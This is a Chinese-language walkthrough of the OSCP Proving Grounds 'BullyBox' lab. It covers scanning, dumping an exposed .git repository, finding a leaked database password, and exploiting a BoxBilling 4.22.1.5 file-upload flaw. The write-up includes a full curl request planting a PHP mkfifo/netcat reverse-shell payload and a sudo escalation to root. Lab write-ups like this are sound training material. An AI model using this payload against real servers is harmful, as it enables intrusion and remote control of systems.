OSCP - Proving Grounds - BullyBox
重要知识点[*]如果发现有域名,则可以到场/etc/hosts后重新执行nmap,nikto等扫描
[*]dirsearch的时候可以使用完整一些的字典文件,制止漏掉信息
[*].git dump
详细步调
执行nmap 扫描,发现 80和22端口开放,访问后发现被重定向到 bullybox.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-14 12:20 UTC
Nmap scan report for 192.168.59.27
Host is up (0.00072s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp openssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
|_256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
80/tcp openhttp Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.52 (Ubuntu)
实行修改/etc/hosts,将ip与bullybox.local绑定,之后重新执行nmap扫描,得到了更多的信息,好比.git路径,以及robots.txt中的entries
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-15 17:50 EDT
Nmap scan report for bullybox.local (192.168.174.27)
Host is up (0.44s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp openssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
|_256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
80/tcp openhttp Apache httpd 2.4.52 ((Ubuntu))
| http-robots.txt: 8 disallowed entries
| /boxbilling/bb-data/ /bb-data/ /bb-library/
|_/bb-locale/ /bb-modules/ /bb-uploads/ /bb-vendor/ /install/
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Client Area
| http-git:
| 192.168.174.27:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: Ready For launch
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
访问robots.txt中的路径,得到疑似admin用户名
https://i-blog.csdnimg.cn/direct/a531ccb605634d138ae48e87ffc1583d.png
使用搜索引擎寻找 可以dump .git的应用,得到GitHub - arthaud/git-dumper: A tool to dump a git repository from a website,实行运行后,乐成dump git代码库,如果配置了署理,记得调用unset http_proxy,否则会报502错误
C:\home\kali\Documents\OFFSEC\GoToWork\BullyBox\git-dumper-master> python git_dumper.py http://bullybox.local/.git ~/Documents/OFFSEC/GoToWork/BullyBox/git-dumper-master/dump
/home/kali/Documents/OFFSEC/GoToWork/BullyBox/git-dumper-master/git_dumper.py:409: SyntaxWarning: invalid escape sequence '\g'
modified_content = re.sub(UNSAFE, '# \g<0>', content, flags=re.IGNORECASE)
[-] Testing http://bullybox.local/.git/HEAD
[-] http://bullybox.local//.git/HEAD responded with status code 502
C:\home\kali\Documents\OFFSEC\GoToWork\BullyBox\git-dumper-master> unset http_proxy
C:\home\kali\Documents\OFFSEC\GoToWork\BullyBox\git-dumper-master> python git_dumper.py http://bullybox.local/.git ~/Documents/OFFSEC/GoToWork/BullyBox/git-dumper-master/dump
/home/kali/Documents/OFFSEC/GoToWork/BullyBox/git-dumper-master/git_dumper.py:409: SyntaxWarning: invalid escape sequence '\g'
modified_content = re.sub(UNSAFE, '# \g<0>', content, flags=re.IGNORECASE)
[-] Testing http://bullybox.local/.git/HEAD
[-] Testing http://bullybox.local/.git/
[-] Fetching common files
[-] Fetching http://bullybox.local/.git/hooks/post-update.sample
[-] Fetching http://bullybox.local/.git/hooks/pre-commit.sample
[-] Fetching http://bullybox.local/.git/hooks/post-commit.sample
[-] http://bullybox.local/.git/hooks/post-commit.sample responded with status code 404
[-] Fetching http://bullybox.local/.git/hooks/pre-applypatch.sample
[-] Fetching http://bullybox.local/.git/description
[-] Fetching http://bullybox.local/.gitignore
[-] http://bullybox.local/.gitignore responded with status code 404
[-] Fetching http://bullybox.local/.git/hooks/post-receive.sample
[-] http://bullybox.local/.git/hooks/post-receive.sample responded with status code 404
[-] Fetching http://bullybox.local/.git/hooks/applypatch-msg.sample
[-] Fetching http://bullybox.local/.git/COMMIT_EDITMSG
[-] Fetching http://bullybox.local/.git/hooks/pre-rebase.sample
[-] Fetching http://bullybox.local/.git/hooks/commit-msg.sample
[-] Fetching http://bullybox.local/.git/hooks/pre-push.sample
[-] Fetching http://bullybox.local/.git/hooks/prepare-commit-msg.sample
[-] Fetching http://bullybox.local/.git/index
[-] Fetching http://bullybox.local/.git/objects/info/packs
[-] http://bullybox.local/.git/objects/info/packs responded with status code 404
[-] Fetching http://bullybox.local/.git/hooks/pre-receive.sample
执行cat /bb-config.php,发现疑似密码,结合已经发现的用户名admin@bullybox.local,登录乐成
array (
'type' => 'mysql',
'host' => 'localhost',
'name' => 'boxbilling',
'user' => 'admin',
'password' => 'Playing-Unstylish7-Provided',
),
https://i-blog.csdnimg.cn/direct/a7a3ee92be9342a1b9592d8b85862e4b.png
发现https://i-blog.csdnimg.cn/direct/59d43a4bb1af4ded8dfbfffa0a80fd11.png版本为4.22.1.5,搜索一下发现有文件上传漏洞BoxBilling<=4.22.1.5 - Remote Code Execution (RCE) - PHP webapps Exploit,实行使用一下
先使用firefox得到Cookie中生存的phpsessionid,并在本地启用nc -nlvp之后调用如下下令,我是用Postman调用的,会生成下面的curl下令
curl --location 'http://bullybox.local/index.php?_url=%2Fapi%2Fadmin%2FFilemanager%2Fsave_file' \
--header 'Cookie: PHPSESSID=tjlfj0mpf85cjgh8g0rjtc0jnn \
--header 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'order_id=1' \
--data-urlencode 'path=reverse.php' \
--data-urlencode 'data=<?php shell_exec('\''rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc 192.168.45.209 80>/tmp/f'\''); ?>'
得到反弹shell,而且具备SUDO权限,可以直接拿到flag
C:\home\kali\Documents\OFFSEC\GoToWork\BullyBox> nc -nlvp 80
listening on 80 ...
connect to from (UNKNOWN) 57090
bash: cannot set terminal process group (1311): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
yuki@bullybox:/var/www/bullybox$ id
id
uid=1001(yuki) gid=1001(yuki) groups=1001(yuki),27(sudo)
yuki@bullybox:/var/www/bullybox$ sudo -l
sudo -l
Matching Defaults entries for yuki on bullybox:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User yuki may run the following commands on bullybox:
(ALL : ALL) ALL
(ALL) NOPASSWD: ALL
yuki@bullybox:/var/www/bullybox$ sudo cat /root/proof.txt
sudo cat /root/proof.txt
2cf1d3dd8eab874dd006dad9912c1388
yuki@bullybox:/var/www/bullybox$
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]